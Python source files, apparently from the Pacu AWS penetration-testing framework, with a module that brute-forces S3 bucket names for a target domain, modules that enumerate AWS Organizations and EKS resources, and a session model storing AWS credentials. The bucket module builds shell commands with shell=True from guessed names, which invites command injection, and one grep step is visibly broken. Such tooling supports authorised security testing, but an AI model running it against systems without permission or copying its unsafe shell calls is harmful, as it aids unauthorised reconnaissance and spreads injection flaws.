bucketlist = {
    'exists': [],
    'listable': [],
}

# Subdomain var to keep track of sublist3r results.
subdomains = []

G = '\033[92m'  # green
Y = '\033[93m'  # yellow
B = '\033[94m'  # blue
R = '\033[91m'  # red
W = '\033[0m'   # white


def main(args, pacu_main):
    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    install_dependencies = pacu_main.install_dependencies
    ######

    # Make sure that this only includes regions that are available for the service you are working with. Some services don't require a region at all
    regions = get_regions('s3')

    # Attempt to install the required external dependencies, exit this module if that fails
    if not install_dependencies(module_info['external_dependencies']):
        return {'buckets': 0, 'listable': 0}

    # List of affixes to append to domain.com and domain in the form of affix.domain.com and affix-domain
    affixes = []

    # Read default keyword list if bruteforcing
    if args.brute:
        with open('./dependencies/Buckets.txt', 'r') as f:
            affixes += [x.strip() for x in f.readlines()]
    # Read filename of user-provided keywords
    elif args.file:
        with open(args.file, 'r') as f:
            affixes += [x.strip() for x in f.readlines()]
    else:
        affixes = []

    # if args.sublister:
    #     from Sublist3r import sublist3r
    #     subdomains = sublist3r.main(args.domain, 30, None, None, False, verbose=True, enable_bruteforce=args.subbrute, engines=None)

    print('Generating bucket permutations list...')
    buckets = create_bucket_list(args.domain, affixes=affixes)

    # for subdomain in subdomains:
    #     subucks = create_bucket_list(subdomain, affixes=affixes)
    #     buckets = buckets.union(subucks)

    for region in regions:
        for bucket in buckets:
            bucket_q.put((region, bucket))

    print('Generated {} bucket permutations. Beginning search across {} regions.'.format(len(buckets), len(regions)))

    global bucket_q_size
    bucket_q_size = bucket_q.qsize()

    for i in range(args.threads):
        t = Thread(target=bucket_worker, args=())
        t.daemon = True
        t.start()

    bucket_q.join()

    print('')
    print('[+] Results:')
    print('    {}Number of Buckets that Exist: {}{}'.format(Y, len(bucketlist['exists']), W))
    print('    {}Number of Buckets that are Listable: {}{}'.format(G, len(bucketlist['listable']), W))

    summary_data = {
        'buckets': len(bucketlist['exists']),
        'listable': len(bucketlist['listable'])
    }

    if args.grep and bucketlist['listable']:
        print('[.] Grepping for keywords in listable buckets from {}'.format(args.grep))

        with open(args.grep, 'r') as file:
            keywords = [x.strip().lower() for x in file.readlines() if x.strip()]

        for domain, region in bucketlist['listable']:
            command = 'aws s3 ls s3://{}/ --region {} --recursive'.format(domain, region)
            command = command.split(' ')
            # with open(os.devnull, 'w') as FNULL:
            output = subprocess.run(command, shell=True, stderr=None)
            output = output.lower()
            if any(x in output for x in keywords):
                print('[!] Found sensitive file on bucket {} in region {}'.format(domain, region))

    return summary_data


def summary(data, pacu_main):
    out = '  {} total buckets were found.\n'.format(data['buckets'])
    out += '  {} buckets were found with viewable contents.\n'.format(data['listable'])
    return out


def create_bucket_list(domain, affixes=[]):
    """
    Create a set of buckets based on a domain name and a list of affixes.
    Note: This will be very large.

    Args:
        domain   (str): Domain to add affixes to, such as google.com
        regions (list): List of AWS regions to query against.
        affixes (list): List of affixes to prefix and suffix to domain.

    Returns:
        set: Set of domain permutations.

    Example:
        > buckets = create_bucket_list("google.com", ["01"])
        > buckets
        ["google.com", "google", "01.google.com", "01.google", "01-google",
        "01google", "01google.com", "google-01", "google01"]
    """
    perms = set()
    # add domain
    perms.add(domain)
    rootword = '.'.join(domain.split('.')[:-1])
    # add rootword
    perms.add(rootword)
    for affix in affixes:
        # affix.domain
        perms.add('{}.{}'.format(affix, domain))
        # affix.rootword
        perms.add('{}.{}'.format(affix, rootword))
        # affix-rootword
        perms.add('{}-{}'.format(affix, rootword))
        # affixdomain
        perms.add('{}{}'.format(affix, domain))
        # affixrootword
        perms.add('{}{}'.format(affix, rootword))
        # rootword-affix
        perms.add('{}-{}'.format(rootword, affix))
        # rootwordaffix
        perms.add('{}{}'.format(rootword, affix))
    return perms


def bucket_worker():
    """
    Wrapper to fetch items from queue and query s3
    """
    while not bucket_q.empty():
        region, bucket = bucket_q.get(timeout=5)
        currcount = bucket_q_size - bucket_q.qsize()
        percentile = round((float(currcount) / float(bucket_q_size)) * 100, 2)

        print('Buckets searched: {}% ({}/{})'.format(percentile, currcount, bucket_q_size), end='\r')

        try:
            ls_s3(region, bucket)
        except subprocess.CalledProcessError:
            pass

        bucket_q.task_done()


def ls_s3(region, domain):
    """
    Takes a region and domain to query awscli and determine if the
    bucket exists or is listable. Pushes results to bucketlist
    dictionary.

    Args:
        region (str): One of the AWS regions specified in settings.py
        domain (str): Domain to target with s3://domain/

    Returns:
        None: No return value as it populates bucketlist
    """
    fails = ['InvalidBucketName', 'NoSuchBucket', 'PermanentRedirect', 'InvalidURI']
    exists = ['AllAccessDisabled', 'AccessDenied', 'InvalidAccessKeyId', 'NoSuchBucketPolicy']

    command = 'aws s3 ls s3://{}/ --region {}'.format(domain, region)

    output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT).decode('utf-8')

    logging.debug('Running command: {}'.format(command))
    logging.debug('Output was:\n{}'.format(output))

    if not any(x in output for x in fails):
        info = (domain, region)
        if any(x in output for x in exists):
            bucketlist['exists'].append(info)
            print('[E] {}{} {}on {}{} {}exists.\n'.format(Y, domain, W, Y, region, W))
            logging.info('[EXISTS] {}\n{}\n{}\n'.format(command, output, '-' * 10))
        else:
            bucketlist['exists'].append(info)
            bucketlist['listable'].append(info)
            print('[L] {}{} {}on {}{} {}is listable.\n'.format(G, domain, W, G, region, W))
            logging.info('[LISTABLE] {}\n{}\n{}\n'.format(command, output, '-' * 10))



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
from copy import deepcopy

# When writing a module, feel free to remove any comments, placeholders, or
# anything else that doesn't relate to your module.

module_info = {
    # Name of the module (should be the same as the filename).
    'name': 'organizations__enum',

    # Name and any other notes about the author.
    'author': 'Scott (@WebbinRoot:/in/webbinroot/), some of base template from Spencer Gietzen\'s glue__enum module',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a
    # user searches for modules.
    'one_liner': 'Enumerates AWS Organizations entities and shows tree of OUs and acounts at the end',

    # Full description about what the module does and how it works.
    'description': 'Module tries to list a bunch of different organization resources like accounts, policies, etc. Also builds a nice graph at the end to visually see relationship between root, accounts, and organizational units. Note you need permissions to list each of these in order to make the tree. Also note that you might need to be the "manager" account (as opposed to a member) for some of these APIs to work.',

    # A list of AWS services that the module utilizes during its execution.
    'services': ['Organizations'],

    # For prerequisite modules, try and see if any existing modules return the
    # data that is required for your module before writing that code yourself;
    # that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either
    # a GitHub URL (must end in .git), or a single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab.
    'arguments_to_autocomplete': [],
}

dot = None


# Every module must include an ArgumentParser named "parser", even if it
# doesn't use any additional arguments.
parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--description', required=False, default=False, action='store_true',  help='Get overview of org')
parser.add_argument('--roots', required = False, default=False, action='store_true',  help='List Roots in org')
parser.add_argument('--policies', required = False, default=False, action='store_true',  help='List Policies in org')
parser.add_argument('--accounts', required=False, default=False, action='store_true',  help='List Accounts in org')
parser.add_argument('--organizational-units', required=False, default=False, action='store_true', help='List Organizational Units in org')
parser.add_argument('--enabled-services', required=False, default=False, action='store_true', help='List Enabled Service Access in org')
parser.add_argument('--delegated-admins', required=False, default=False, action='store_true', help='List Delegated Administrators in org')
parser.add_argument('--delegated-services', required=False, default=False, nargs='*', help='List Delegated Services in org per account ID. If necessary manualy pass in organization IDs.')
parser.add_argument('--delegation-policy', required = False, default=False, action='store_true',  help='Get Organization Resource-Based Delegation Policy')
parser.add_argument('--tree', required=False, default=False, nargs='?', help='Generate visual tree using root, accounts, and OUs')

paginated_operations = [
    "list_accounts",
    "list_accounts_for_parent",
    "list_aws_service_access_for_organization",
    "list_children",
    "list_create_account_status",
    "list_delegated_administrators",
    "list_delegated_services_for_account",
    "list_handshakes_for_account",
    "list_handshakes_for_organization",
    "list_organizational_units_for_parent",
    "list_parents",
    "list_policies",
    "list_policies_for_target",
    "list_roots",
    "list_tags_for_resource",
    "list_targets_for_policy"
]

def fetch_org_data(client, func, key, print, **kwargs):
    try:
        if func in paginated_operations:
            
            response = []
            paginator = client.get_paginator(func)
            page_iterator = paginator.paginate(**kwargs)
            for page in page_iterator:
                response += page[key]
            return response
          
    
        else:
            caller = getattr(client, func)
            response = caller(**kwargs)
            return response[key]

    except ClientError as error:
        code = error.response['Error']['Code']
        
        if code == 'AccessDeniedException':
            print('({}) PERMISSION FAILURE: MISSING NEEDED PERMISSIONS'.format(func))
        
        elif code == 'AccountNotRegisteredException' and func == 'list_delegated_services_for_account':
            print('({}) LOGIC FAILURE: AWS ACCOUNT NOT DELEGATED ADMINISTRATOR'.format(func)) 
        
        else:
            print('({}) DEFAULT FAILURE: {}'.format(func, code))
    
    except Exception as error:
            print('({}) UNABLE TO EXECUTE DUE TO GENERIC FAILURE: {}'.format(func, error))

    return []

# Recursive build for tree
def create_tree(client, print, parent_node):

    parent_node_id, parent_node_name = parent_node["Id"], parent_node["Name"]
    parent_node_title = parent_node_name+" ("+parent_node_id+")"

    # Add root or OU node
    color = "red" if parent_node_name == "Root" else "orange"
    dot.node(parent_node_title, color=color, style="filled")

    # Get list of accounts under OU or Root
    accounts = fetch_org_data(client, 'list_accounts_for_parent', 'Accounts', print, ParentId=parent_node_id)
    for account in accounts:
        dot.node(account["Name"]+" ("+account["Id"]+")", color="green",style="filled")
        dot.edge(parent_node_title, account["Name"]+" ("+account["Id"]+")")
        
    org_units = fetch_org_data(client, 'list_organizational_units_for_parent', 'OrganizationalUnits', print, ParentId = parent_node_id)
    if len(org_units) == 0:
        pass
    else:
        for org in org_units:
            dot.node(org["Name"]+" ("+org["Id"]+")", color="green",style="filled")
            dot.edge(parent_node_title, org["Name"]+" ("+org["Id"]+")")
            create_tree(client, print, org)

# Recursive get for org;
def get_org_units(client, print, parent_node, starting_orgs):
    parent_node_id, parent_node_name = parent_node["Id"], parent_node["Name"]   
    org_units = fetch_org_data(client, 'list_organizational_units_for_parent', 'OrganizationalUnits', print, ParentId = parent_node_id)
    if len(org_units) == 0:
        pass
    else:
        for org in org_units:
            starting_orgs.append(org)
            get_org_units(client, print, org, starting_orgs=starting_orgs)
    return starting_orgs



# Main is the first function that is called when this module is executed.
def main(args, pacu_main):


    session = pacu_main.get_active_session()

    ###### These can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######
    
    # None is --tree with no argument
    args.tree = True if args.tree == None else args.tree
    args.delegated_services = True if args.delegated_services == [] else args.delegated_services

    # If all false, set all to true for following checks
    if True not in [ args.description, args.accounts, args.policies, args.roots, args.organizational_units, args.enabled_services, args.delegated_admins, bool(args.delegated_services), bool(args.tree), args.delegation_policy]:

        args.description = args.accounts = args.policies = args.roots = args.organizational_units = args.enabled_services = args.delegated_admins = args.delegated_services = args.tree = args.delegation_policy = True
        
        # If empty list passed in retain that value for later
        #args.delegated_services = True if args.delegated_services == None else args.delegated_services

    all_description = []
    all_roots = []
    all_policies = []
    all_accounts = []
    all_org_units = []
    all_enabled_services = []
    all_delegated_admins = []
    all_delegated_services = []
    all_delegation_policy = []

    client = pacu_main.get_boto3_client('organizations')

    # General Description
    if args.description:
        description = fetch_org_data(client, 'describe_organization', 'Organization', print)

        # Dictionary returning means data was found
        if type(description) == dict:
            description = [description]
            
        print('{} general info(s) found.'.format(len(description)))
        all_description += description
    
    # Roots
    if args.roots:

        roots = fetch_org_data(client, 'list_roots', 'Roots', print)
        print('{} root(s) found.'.format(len(roots)))
        all_roots += roots

    # TODO List Attached Policies as Well
    # Policies 
    if args.policies:
        for policy_filter in ["AISERVICES_OPT_OUT_POLICY", "BACKUP_POLICY", "SERVICE_CONTROL_POLICY", "TAG_POLICY"]:
            policies = fetch_org_data(client, 'list_policies', 'Policies', print, Filter=policy_filter)
            print('{} polices of type {} found.'.format(len(policies), policy_filter))
            all_policies += policies

    # Accounts
    if args.accounts:
        accounts = fetch_org_data(client, 'list_accounts', 'Accounts', print)
        print('{} accounts (s) found.'.format(len(accounts)))
        all_accounts += accounts

    # TODO Add multiple ways to get this besides root
    # Organizational Units (no list function, have to check graph)
    if args.organizational_units:
        all_roots_alt = fetch_org_data(client, 'list_roots', 'Roots', print)
        for root in all_roots_alt:
            all_org_units = get_org_units(client, print, root, starting_orgs = [])
                
        print('{} organizational unit(s) found.'.format(len(all_org_units)))

    # Enabled Services
    if args.enabled_services:
        enabled_services = fetch_org_data(client, 'list_aws_service_access_for_organization', 'EnabledServicePrincipals', print)
        print('{} enabled service(s) found.'.format(len(enabled_services)))
        all_enabled_services += enabled_services

    # Delegated Admins
    if args.delegated_admins:
        delegated_admins = fetch_org_data(client, 'list_delegated_administrators', 'DelegatedAdministrators', print)
        print('{} delegated administrator(s) found.'.format(len(delegated_admins)))
        all_delegated_admins += delegated_admins

    # Delegated Services; If list exists either set to true or will default to true
    if bool(args.delegated_services):

        # full list [A,B,C]
        extract_flag = False
        if type(args.delegated_services) == list and len(args.delegated_services) != 0:
            accounts = args.delegated_services
        
        # empty list []
        else:
            extract_flag = True
            accounts = fetch_org_data(client, 'list_accounts', 'Accounts', print)
            if len(accounts) == 0:
                 print('It appears like trying to list Organization AWS Account Numbers returned nothing. If necessary try passing in the same argument with specified organization IDs via --delegated-services ACCOUNT1 ACCOUNT2 ...')

        #TODO fix bug test case of pass in valid account, followed by invalid account, voids previous one
        for account in accounts:
            if extract_flag: 
                account = account['Id']
            delegated_services = fetch_org_data(client, 'list_delegated_services_for_account', 'DelegatedServices', print, AccountId=account)
            print('{} delegated services(s) found in Account {}.'.format(len(delegated_services), account))
            if len(delegated_services) != 0:
                all_delegated_services += [{account: delegated_services}]
          
    # Note need root, accounts, and OUs to do this assessment
    if bool(args.tree):
        print("Trying to create tree of all collected so far")
        
        all_roots_alt = fetch_org_data(client, 'list_roots', 'Roots', print)
        
        try:
            import graphviz
            if len(all_roots_alt) != 0:
                for root in all_roots_alt:

                    global dot 

                    dot = graphviz.Digraph(format="pdf",comment="Organization Hierarchy for Root "+root["Id"])

                    create_tree(client, print, root)
            
                    if type(args.tree) == bool and args.tree == True:
                        file_path = "./GraphOutput/"+root["Id"]+".gv"
                    elif type(args.tree) != bool:
                        file_path = args.tree

                    dot.render(filename=file_path)

                print("New Organization Chart Created at "+file_path)
            else:
                print("No roots were found to begin building a tree. Exiting tree build...")
        except Exception as e:
            print("Graphical Tree could not be created due to following exception: {}".format(e))

    # Resource Policies (Accessible for Delegated Admins)
    if args.delegation_policy:
        delegation_policy = fetch_org_data(client, 'describe_resource_policy', 'ResourcePolicy', print)

        # Dictionary returning means data was found
        if type(delegation_policy) == dict:
            delegation_policy = [delegation_policy]

        print('{} resource-based delegation policy(s) found.'.format(len(delegation_policy)))
        all_delegation_policy += delegation_policy

    summary_data = {}
    org_data = deepcopy(session.Organizations)

    if args.description: 
        summary_data['description'] = len(all_description)
        org_data['Overview'] = all_description

    if args.roots: 
        summary_data['roots'] = len(all_roots)
        org_data['Roots'] = all_roots

    if args.policies: 
        summary_data['policies'] = len(all_policies)
        org_data['Policies'] = all_policies

    if args.accounts: 
        summary_data['accounts'] = len(all_accounts)
        org_data['Accounts'] = all_accounts

    if args.organizational_units: 
        summary_data['organizational units'] = len(all_org_units)
        org_data['Organizational Units'] = all_org_units

    if args.enabled_services: 
        summary_data['enabled services'] = len(all_enabled_services)
        org_data['Enabled Services'] = all_enabled_services

    if args.delegated_admins: 
        summary_data['delegated admins'] = len(all_delegated_admins)
        org_data['Delegated Administrators'] = all_delegated_admins

    if args.delegated_services or args.delegated_services == []: 
        summary_data['delegated services'] = len(all_delegated_services)
        org_data['Delegated Services'] = all_delegated_services

    if args.delegation_policy:
        summary_data['resource-based delegation policies'] = len(all_delegation_policy)
        org_data['Resource-Based Delegation Policy'] = all_delegation_policy       

    session.update(pacu_main.database, Organizations=org_data)   
    return summary_data

def summary(data, pacu_main):
    out = ''
    for key in data:
        out += '{} total {}(s) found.\n'.format(data[key], key)
    out += '\n  Organization resources saved in Pacu database.\n'
    return out




#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError

module_info = {
    'name': 'eks_enum',
    'author': 'David Fentz',
    'category': 'ENUM',
    'one_liner': 'This module enumerates over EKS resources.',
    'description': 'This module enumerates over EKS resources.',
    'services': ['EKS'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': [
        '--regions',
        '--no_addons',
        '--no_identity_provider_configs',
        '--no_fargate_profiles',
    ],
}


parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')
parser.add_argument('--no_addons', required=False, action='store_true', default=False, help='Exclude EKS addons')
parser.add_argument('--no_identity_provider_configs', required=False, action='store_true', default=False, help='Exclude EKS identity provider configs')
parser.add_argument('--no_fargate_profiles', required=False, action='store_true', default=False, help='Exclude EKS fargate profiles')

def main(args, pacu_main):
    args = parser.parse_args(args)
    print = pacu_main.print
    session = pacu_main.get_active_session()
    get_regions = pacu_main.get_regions
    data = {}
    cluster_count = 0

    if args.regions is None:
        regions = get_regions('eks')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    for region in regions:
        try:
            eks_client = pacu_main.get_boto3_client('eks', region)
            cluster_paginator = eks_client.get_paginator("list_clusters")
            cluster_page_iterator = cluster_paginator.paginate(PaginationConfig={'PageSize': 50})
            data[region] = { # use this to count clusters
                "clusters": {}
            }
            for page in cluster_page_iterator:
                clusters = page["clusters"]
                for cluster in clusters:
                    nodegroups = []
                    addons = []
                    fargate_profiles = []
                    ip_configs = []

                    nodegroup_paginator = eks_client.get_paginator("list_nodegroups")
                    nodegroup_page_iterator = nodegroup_paginator.paginate(clusterName=cluster, PaginationConfig={'PageSize': 50})
                    addon_paginator = eks_client.get_paginator("list_addons")
                    addon_page_iterator = addon_paginator.paginate(clusterName=cluster, PaginationConfig={'PageSize': 50})
                    fargate_paginator = eks_client.get_paginator("list_fargate_profiles")
                    fargate_page_iterator = fargate_paginator.paginate(clusterName=cluster, PaginationConfig={'PageSize': 50})
                    ip_config_paginator = eks_client.get_paginator("list_identity_provider_configs")
                    ip_config_page_iterator = ip_config_paginator.paginate(clusterName=cluster, maxResults=1, PaginationConfig={'PageSize': 1})

                    for page in nodegroup_page_iterator:
                        nodegroups.append(page["nodegroups"])
                    for page in addon_page_iterator:
                        addons.append(page["addons"])
                    for page in fargate_page_iterator:
                        fargate_profiles.append(page["fargateProfileNames"])
                    for page in ip_config_page_iterator:
                        ip_configs.append(page["identityProviderConfigs"])

                    data[region]['clusters'][cluster] = {
                        "cluster_description": eks_client.describe_cluster(name=cluster)["cluster"],
                        "nodegroups": nodegroups
                    }
                    if not args.no_addons:
                        data[region]['clusters'][cluster]["addons"] = addons
                    if not args.no_fargate_profiles:
                        data[region]['clusters'][cluster]["fargate_profiles"] = fargate_profiles
                    # if not args.no_identity_provider_configs:
                        # data[region]['clusters'][cluster]["identity_provider_configs"] = ip_configs

            region_clusters = [cluster for cluster in data[region]["clusters"]]
            print(f"clusters in {region}: {region_clusters}")
            cluster_count += len(data[region]["clusters"])
        except ClientError as error:
            code = error.response["Error"]["Code"]
            if code == "AccessDeniedException":
                print(f"Access denied to EKS in {region}.")
            else:
                print(f"Error: {error}")
            continue
    session.update(pacu_main.database, EKS=data) 
    return cluster_count
    

def summary(cluster_count, pacu_main):
    return f"Found {cluster_count} clusters in total.\nTo see EKS data, run \"data EKS\","



import datetime
import json
import copy

from sqlalchemy import (
    Boolean, Column, DateTime, ForeignKey, inspect, Integer, Text, orm
)
from sqlalchemy.orm import relationship, Session
from sqlalchemy_utils import JSONType  # type: ignore

from pacu.core.base import Base, engine
from pacu.core.mixins import ModelUpdateMixin
from pacu.utils import remove_empty_from_dict


class AWSKey(Base, ModelUpdateMixin):
    __tablename__ = 'aws_key'

    id = Column(Integer, primary_key=True)

    session_id = Column(Integer, ForeignKey('pacu_session.id', ondelete='CASCADE'))
    session = relationship("PacuSession", back_populates="aws_keys")

    user_name = Column(Text)
    role_name = Column(Text)
    arn = Column(Text)
    account_id = Column(Text)
    user_id = Column(Text)
    roles = Column(JSONType)
    groups = Column(JSONType)
    policies = Column(JSONType)
    access_key_id = Column(Text)
    secret_access_key = Column(Text)
    session_token = Column(Text)
    key_alias = Column(Text)
    permissions_confirmed = Column(JSONType)
    allow_permissions = Column(JSONType, nullable=False, default=dict)
    deny_permissions = Column(JSONType, nullable=False, default=dict)

    def __repr__(self):
        return '<AWSKey #{}: {}>'.format(self.id, self.key_alias)

    def get_fields_as_camel_case_dictionary(self) -> dict:
        # Deep copy because Permissions->allow_permissions and deny_permissions were dicts that were being passed as reference
        return copy.deepcopy({
            'UserName': self.user_name,
            'RoleName': self.role_name,
            'Arn': self.arn,
            'AccountId': self.account_id,
            'UserId': self.user_id,
            'Roles': self.roles,
            'Groups': self.groups,
            'Policies': self.policies,
            'AccessKeyId': self.access_key_id,
            'SecretAccessKey': self.secret_access_key,
            'SessionToken': self.session_token,
            'KeyAlias': self.key_alias,
            'PermissionsConfirmed': self.permissions_confirmed,
            'Permissions': {
                'Allow': remove_empty_from_dict(self.allow_permissions),
                'Deny': remove_empty_from_dict(self.deny_permissions),
            },
        })



class PacuSession(Base, ModelUpdateMixin):
    __tablename__ = 'pacu_session'
    aws_data_field_names = (
        'APIGateway',
        'CloudTrail',
        'CloudWatch',
        'CodeBuild',
        'Cognito',
        'Config',
        'DataPipeline',
        'DynamoDB',
        'EC2',
        'ECS',
        'EKS',
        'Glue',
        'GuardDuty',
        'IAM',
        'Inspector',
        'Lambda',
        'Lightsail',
        'S3',
        'SecretsManager',
        'Shield',
        'SSM',
        'VPC',
        'WAF',
        'Account',
        'AccountSpend',
        'Route53',
        'RDS',
        'Transfer',
        'Organizations'
    )

    aws_keys = relationship('AWSKey', back_populates='session', cascade='all, delete-orphan', lazy='dynamic')

    id = Column(Integer, primary_key=True)
    created = Column(DateTime, default=datetime.datetime.utcnow)
    is_active = Column(Boolean, nullable=False, default=False)
    name = Column(Text)
    boto_user_agent = Column(Text)
    user_agent_suffix = Column(Text)
    key_alias = Column(Text)
    access_key_id = Column(Text)
    secret_access_key = Column(Text)
    session_token = Column(Text)
    session_regions = Column(JSONType, nullable=False, default=['all'])

    APIGateway = Column(JSONType, nullable=False, default=dict)
    CloudTrail = Column(JSONType, nullable=False, default=dict)
    CloudWatch = Column(JSONType, nullable=False, default=dict)
    CodeBuild = Column(JSONType, nullable=False, default=dict)
    Cognito = Column(JSONType, nullable=False, default=dict)
    Config = Column(JSONType, nullable=False, default=dict)
    DataPipeline = Column(JSONType, nullable=False, default=dict)
    DynamoDB = Column(JSONType, nullable=False, default=dict)
    EC2 = Column(JSONType, nullable=False, default=dict)
    ECS = Column(JSONType, nullable=False, default=dict)
    EKS = Column(JSONType, nullable=False, default=dict)
    Glue = Column(JSONType, nullable=False, default=dict)
    GuardDuty = Column(JSONType, nullable=False, default=dict)
    IAM = Column(JSONType, nullable=False, default=dict)
    Inspector = Column(JSONType, nullable=False, default=dict)
    Lambda = Column(JSONType, nullable=False, default=dict)
    Lightsail = Column(JSONType, nullable=False, default=dict)
    RDS = Column(JSONType, nullable=False, default=dict)
    S3 = Column(JSONType, nullable=False, default=dict)
    SecretsManager = Column(JSONType, nullable=False, default=dict)
    SSM = Column(JSONType, nullable=False, default=dict)
    Shield = Column(JSONType, nullable=False, default=dict)
    VPC = Column(JSONType, nullable=False, default=dict)
    WAF = Column(JSONType, nullable=False, default=dict)
    WAFRegional = Column(JSONType, nullable=False, default=dict)
    Account = Column(JSONType, nullable=False, default=dict)
    AccountSpend = Column(JSONType, nullable=False, default=dict)
    Route53 = Column(JSONType, nullable=False, default=dict)
    RDS = Column(JSONType, nullable=False, default=dict)
    Transfer = Column(JSONType, nullable=False, default=dict)
    Organizations = Column(JSONType, nullable=False, default=dict)

    def __repr__(self) -> str:
        if self.key_alias:
            key_alias = self.key_alias
        else:
            key_alias = 'No Keys Set'
        if self.is_active:
            return '<PacuSession #{} ({}:{}) (ACTIVE)>'.format(self.id, self.name, key_alias)
        return '<PacuSession #{} ({}:{})>'.format(self.id, self.name, key_alias)

    @classmethod
    def get_active_session(cls, database: Session) -> 'PacuSession':
        # SQLAlchemy's query filters disallow the use of `cond is True`.
        return database.query(PacuSession).filter(PacuSession.is_active == True).scalar()  # noqa: E712


    def get_active_aws_key(self, database: Session) -> AWSKey:
        """ Return the AWSKey with the same key_alias as the PacuSession.
        A temporary function that will be replaced with a foreign key to AWSKey
        after future refactoring. """

        # On attr-defined ignore: https://github.com/dropbox/sqlalchemy-stubs/issues/168
        return self.aws_keys.filter(AWSKey.key_alias == self.key_alias).scalar()  # type: ignore[attr-defined]
        # return database.query(AWSKey).filter(AWSKey.key_alias == self.key_alias).filter(AWSKey.pacu_session_id == self.id).scalar()

    def activate(self, database: orm.session.Session) -> None:
        for other_session in database.query(PacuSession).filter(PacuSession.id != self.id):
            other_session.is_active = False
            database.add(other_session)

        self.is_active = True
        database.add(self)

        database.commit()

    def print_all_data_in_session(self) -> None:
        text = list()
        mapper = inspect(self)

        # mapper.attrs stores all model fields in order of definition.
        for column in mapper.attrs:
            cleaned_value = remove_empty_from_dict(column.value)

            if column.key == 'aws_keys':
                owned_keys = column.value.all()
                if owned_keys:
                    text.append('aws_keys: [')
                    for each_key in owned_keys:
                        text.append('    <AWSKey: {}>'.format(each_key.key_alias))
                    text.append(']')

            elif column.key == 'secret_access_key':
                text.append('secret_access_key: "******" (Censored)')

            elif cleaned_value:
                text.append('{}: {}'.format(column.key, json.dumps(cleaned_value, indent=4, default=str)))

        if text:
            print('\n'.join(text))
        else:
            print('This session has no data.')

    def get_all_fields_as_dict(self) -> dict:
        all_data = dict()
        mapper = inspect(self)
        for attribute in mapper.attrs:
            all_data[attribute.key] = attribute.value
        return all_data

    def get_all_aws_data_fields_as_dict(self):
        all_data = dict()
        mapper = inspect(self)

        for attribute in mapper.attrs:
            if attribute.key in self.aws_data_field_names:
                if attribute.value:
                    all_data[attribute.key] = attribute.value

        return remove_empty_from_dict(all_data)


def migrations(database: 'Session'):
    """Very hacky migrations for the pacu_session table.

    This exists to prevent broken installs on update when modules add new columns to the PacuSession table. This will
    only add columns that are included in PacuSession.aws_data_field_names and will assume the columns should be NOT
    NULL.
    """
    rows = []
    for row in database.execute(f'pragma table_info({PacuSession.__tablename__})').fetchall():
        rows.append(row[1])

    # If more rows are added here change this to update the db dynamically. Not worrying about this for now since it
    # doesn't happen often, and we'll likely rewrite things before then.
    if "user_agent_suffix" not in rows:
        column_type = PacuSession.user_agent_suffix.type.compile(engine.dialect)
        database.execute('ALTER TABLE %s ADD COLUMN user_agent_suffix %s' % (PacuSession.__tablename__, column_type))

    for svc in PacuSession.aws_data_field_names:
        if svc not in rows:
            column = getattr(PacuSession, svc)
            column_type = column.type.compile(engine.dialect)
            database.execute(
                'ALTER TABLE %s ADD COLUMN %s %s DEFAULT "{}" NOT NULL'
                % (PacuSession.__tablename__, svc, column_type)
            )


